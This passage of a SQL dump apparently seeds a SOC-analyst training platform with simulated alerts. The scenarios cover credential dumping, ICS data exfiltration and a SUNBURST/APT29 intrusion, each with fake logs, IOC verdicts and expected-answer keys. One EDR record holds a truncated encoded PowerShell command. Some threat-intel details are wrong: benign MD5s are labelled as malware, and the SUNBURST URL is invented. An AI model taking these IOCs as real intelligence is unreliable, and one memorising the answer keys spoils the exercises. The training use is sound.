detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(554, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Using dumped credentials, the attacker moves laterally through the network, targeting systems connected to industrial control networks.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"SMB\",\"username\":\"admin_jdoe\",\"filename\":\"credentials.dmp\",\"hash\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"action\":\"Successful Login\",\"log_id\":\"123456789\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the target system within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid network administrator account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File associated with credential dumping activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(555, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention', 'A data exfiltration attempt was detected involving critical industrial control system information. The attacker utilized a known malware to transfer files to an external IP address.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:55:32Z\",\"event_id\":\"DLP-2023-1025-0001\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"filename\":\"ICS_critical_data.zip\",\"action\":\"block\",\"protocol\":\"HTTPS\",\"outcome\":\"success\",\"description\":\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with known exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ICS_critical_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of targeted ICS data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised to facilitate data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(556, 'Initial Access via Compromised SolarWinds Update', 'critical', 'Network Traffic Logs', 'APT29 gains initial access by compromising the SolarWinds Orion software update, distributing the SUNBURST backdoor to numerous high-profile targets. Anomalous network traffic detected from an internal server communicating with a known malicious external IP associated with the SUNBURST backdoor.', 'Supply Chain Attack', 'T1195.002', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.100.87.55\",\"protocol\":\"HTTPS\",\"src_port\":443,\"dest_port\":443,\"http_request\":{\"url\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"method\":\"GET\"},\"file_hash\":\"b91ce2fa41029f6955bff20079468448\",\"user_agent\":\"SolarWindsOrion/2020.2.1\",\"internal_username\":\"admin\"}', '2026-01-07 22:39:53', '2026-02-16 18:07:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server identified as part of the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with SUNBURST backdoor activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to SUNBURST.dll known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"URL distributing SUNBURST backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(557, 'SUNBURST Backdoor Activation', 'critical', 'Endpoint Detection Systems', 'Upon successful update, the SUNBURST backdoor is activated, allowing APT29 to remotely control the infected systems.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"4521\",\"source_ip\":\"185.243.115.84\",\"destination_ip\":\"10.0.0.15\",\"filename\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"hash\":\"b91ce2fa41029f6955bff20079468448\",\"user\":\"jdoe\",\"process\":\"orion.exe\",\"action\":\"execution\",\"details\":\"The SolarWinds.Orion.Core.BusinessLayer.dll file was executed, activating the SUNBURST backdoor.\",\"protocol\":\"TCP\"}', '2026-01-07 22:39:53', '2026-02-16 18:07:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.243.115.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with SUNBURST malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File involved in SUNBURST backdoor activation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(558, 'Establishing Persistence with SUNBURST', 'high', 'System Registry Changes', 'APT29 is leveraging the SUNBURST backdoor to modify system registry settings, ensuring long-term access to the compromised networks.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"SunburstPersistence\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"hash\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Program Files\\\\SolarWinds\\\\Orion\\\\Sunburst.dll\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT29 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the SUNBURST backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Sunburst.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File associated with SUNBURST malware used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 